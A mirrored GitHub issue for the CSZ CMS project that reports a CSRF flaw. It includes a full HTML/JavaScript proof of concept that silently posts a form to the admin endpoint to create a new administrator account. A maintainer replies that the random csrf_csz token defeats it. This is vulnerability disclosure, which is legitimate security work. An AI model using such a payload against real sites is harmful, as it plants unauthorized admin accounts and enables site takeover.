Giters

cskaza / cszcms

Open Source CMS (Content Management System) with Codeigniter and Bootstrap.

Home Page:https://www.cszcms.com

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

There is one CSRF vulnerability that can add the administrator account

RitaWWang opened this issue · comments

commented

After the administrator logged in, open the following page
poc:
one.html---add a administrator

  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost\/cszcms-master\/admin\/users\/new\/add", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykobVwTQR7Qxut2B0");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"csrf_csz\"\r\n" + 
          "\r\n" + 
          "f34972c37ae66af1cf3355b95a25e347\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"name\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"email\"\r\n" + 
          "\r\n" + 
          "test3@test3.com\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"password\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"con_password\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"group\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"active\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"first_name\"\r\n" + 
          "\r\n" + 
          "te\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"last_name\"\r\n" + 
          "\r\n" + 
          "st\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"year\"\r\n" + 
          "\r\n" + 
          "1929\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"month\"\r\n" + 
          "\r\n" + 
          "02\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"day\"\r\n" + 
          "\r\n" + 
          "02\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"gender\"\r\n" + 
          "\r\n" + 
          "male\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"address\"\r\n" + 
          "\r\n" + 
          "123\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"phone\"\r\n" + 
          "\r\n" + 
          "15826597895\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"file_upload\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Save\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>```
commented

It not working for all. Because you don't know csrf_csz key on next submit. It's random.